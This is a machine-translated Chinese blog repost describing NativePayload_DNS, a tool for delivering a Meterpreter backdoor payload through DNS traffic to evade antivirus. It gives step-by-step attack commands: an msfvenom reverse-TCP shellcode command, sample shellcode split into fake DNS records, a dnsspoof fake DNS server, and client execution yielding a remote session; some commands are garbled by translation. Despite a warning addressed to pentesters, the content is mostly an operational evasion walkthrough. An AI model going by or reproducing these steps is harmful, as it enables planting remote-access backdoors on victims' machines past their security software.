NativePayload_DNS,通過DNS流量,繞過防病毒傳輸後門

z奶油麵包發表於2018-02-28
版權宣告:轉載請註明出處:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396319

傳送門

注意標點符號,必須是英文的。

通過DNS流量和繞過防病毒傳輸的後門有效負載的C#程式碼

由Damon Mohammadbagher發表

警告:此程式碼釋出用於解釋針對Pentesters和安全研究人員的反病毒漏洞

欲瞭解更多資訊,請一步一步訪問以下連結:
通過DNS流量繞過帶有傳輸後門有效負載的反病毒文章備份地址

視訊由Damon Mohammadbagher發行(bbxc9x00x1f)
繞過反病毒與DNS流量傳輸後門有效負載視訊(需要訪問YouTube)

用NativePayload_DNS和Meterpreter_Payload_Detection繞過AV視訊(需要訪問YouTube)

視訊說明:使用NativePayload_DNS.exe繞過AV並通過Meterpreter_Payload_Detection工具檢測Meterpreter程式

步驟1:

msfvenom C型別的有效負載在你的kali linux

msfvenom --platform windows -arch x86_64 -p windows/x64 /meterpreter/reverse_tcp lhost = 192.168.1.50 -fc> /root/Desktop/payload.txt

將有效載荷從payload.txt檔案複製到dns.txt,格式如下:

root @ kali:〜#cat /root/Desktop/dns.txt

1.1.1.0“0xfc0x480x830xe40xf00xe80xcc0x000x000x000x410x510x410x500x52.1.com”

1.1.1.1“0x510x560x480x310xd20x650x480x8b0x520x600x480x8b0x520x180x48.1.com”

1.1.1.2“0x8b0x520x200x480x8b0x720x500x480x0f0xb70x4a0x4a0x4d0x310xc9.1.com”

1.1.1.3“0x480x310xc00xac0x3c0x610x7c0x020x2c0x200x410xc10xc90x0d0x41.1.com”

步驟2:在您的kali linux中製作假DNS伺服器

root @ kali:〜#dnsspoof -i eth0 -f /root/Desktop/dns.txt

步驟3:

在客戶端執行程式碼
語法:

NativePayload_DNS.exe“1.1.1”. 34“192.168.1.50”

最後你可以繞過AV,你有Meterpreter Session

欲瞭解更多資訊,請一步一步訪問以下連結:
通過DNS流量繞過帶有傳輸後門有效負載的反病毒

通過DNS流量繞過帶有傳輸後門有效負載的反病毒,備份地址

相關工具: 用於通過IPv6地址(AAAA)記錄和DNS流量傳輸的Backdoor Payload的C#程式碼也繞過防病毒

相關連結: 用C#通過加密有效載荷繞過所有防病毒


相關文章